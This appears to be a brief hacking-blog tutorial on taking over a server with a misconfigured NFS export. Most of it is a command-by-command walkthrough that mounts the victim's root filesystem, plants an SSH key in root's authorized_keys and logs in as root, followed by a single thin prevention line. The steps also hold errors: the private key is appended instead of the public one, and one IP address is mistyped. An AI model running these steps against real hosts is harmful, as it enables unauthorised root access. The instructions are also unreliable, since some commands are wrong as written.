Exploit a Misconfigured NFS Server | SSH | RPCbind

What NFS Server is ?

NFS is network file system and it is a client server system that allows client to access shared files over a network. It allows client to mount all directories. We are going to access a file system and import our private ssh key to  authorized key file gain root access via SSH. In the last i will tell how to prevent this this type of attacks on your server.

Let the victim ip is 192.168.43.176

open terminal and type rpcinfo -p 192.168.43.176  this will return all the registered RPC programs.

many people get the error that rpcinfo command not found “sudo apt update && sudo apt install rpcbind”

type sudo showmount -e 192.168.43.176 this will return the mount directories.

/ * means root directory
now create a tmp file for mount mkdir /tmp/dir this will create a temporary directory for mount the nfs server, now mount server to temporary directory type command mount -o nolock -t nfs 192.167.43.176:/ /tmp/dir 

now generate ssh key command ssh-keygen that will create a key in your /home/h0nk3r/.ssh/id_rsa

now import the key command cat /home/h0nk3r/.ssh/id_rsa >> /tmp/dir/root/.ssh/authorized_keys that will send your ssh key to the nfs server to gain access to root via ssh now just umount the shared directory umount /tmp/dir 

 

Now You can directly connect to the server type command ssh root@192.168.43.176 

Prevention:

If i am the owner of this server i can manage users with group and with the specific privileges and never use the root directory  as mount point.

Conclusion

Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.
Hope you had a nice reading, comming back to hacknews.